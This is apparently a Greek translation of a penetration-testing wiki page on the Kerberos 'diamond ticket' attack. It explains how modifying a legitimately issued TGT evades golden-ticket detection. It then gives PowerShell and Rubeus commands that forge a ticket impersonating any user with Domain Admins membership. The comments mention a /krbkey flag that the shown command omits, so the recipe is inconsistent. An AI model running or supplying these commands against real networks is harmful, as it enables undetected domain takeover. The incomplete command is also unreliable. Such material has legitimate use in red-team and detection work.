Διαμαντένιο Εισιτήριο

Όπως ένα χρυσό εισιτήριο, ένα διαμαντένιο εισιτήριο είναι ένα TGT που μπορεί να χρησιμοποιηθεί για να έχετε πρόσβαση σε οποιαδήποτε υπηρεσία ως οποιοσδήποτε χρήστης. Ένα χρυσό εισιτήριο δημιουργείται πλήρως εκτός σύνδεσης, κρυπτογραφείται με το hash του krbtgt της περιοχής και στη συνέχεια περνιέται σε μια συνεδρία σύνδεσης για χρήση. Επειδή οι ελεγκτές τομέων δεν καταγράφουν τα TGT που έχουν εκδοθεί νόμιμα, θα δεχθούν ευχαρίστως TGT που έχουν κρυπτογραφηθεί με το δικό τους krbtgt hash.

Υπάρχουν δύο κοινές τεχνικές για τον εντοπισμό της χρήσης χρυσών εισιτηρίων:

• Αναζήτηση για TGS-REQs που δεν έχουν αντίστοιχο AS-REQ.

• Αναζήτηση για TGTs που έχουν αστείες τιμές, όπως η προεπιλεγμένη διάρκεια ζωής 10 ετών του Mimikatz.

Ένα διαμαντένιο εισιτήριο δημιουργείται τροποποιώντας τα πεδία ενός νόμιμου TGT που έχει εκδοθεί από έναν ελεγκτή τομέα. Αυτό επιτυγχάνεται με το ζήτημα ενός TGT, την αποκρυπτογράφησή του με το hash krbtgt του τομέα, την τροποποίηση των επιθυμητών πεδίων του εισιτηρίου και στη συνέχεια την επανακρυπτογράφησή του. Αυτό ξεπερνά τα δύο προαναφερθέντα μειονεκτήματα ενός χρυσού εισιτηρίου επειδή:

• Τα TGS-REQs θα έχουν ένα προηγούμενο AS-REQ.

• Το TGT εκδόθηκε από έναν ελεγκτή τομέα, πράγμα που σημαίνει ότι θα έχει όλες τις σωστές λεπτομέρειες από την πολιτική Kerberos του τομέα. Αν και αυτές μπορούν να πλαστογραφηθούν με ακρίβεια σε ένα χρυσό εισιτήριο, είναι πιο περίπλοκο και ευάλωτο σε λάθη.

# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.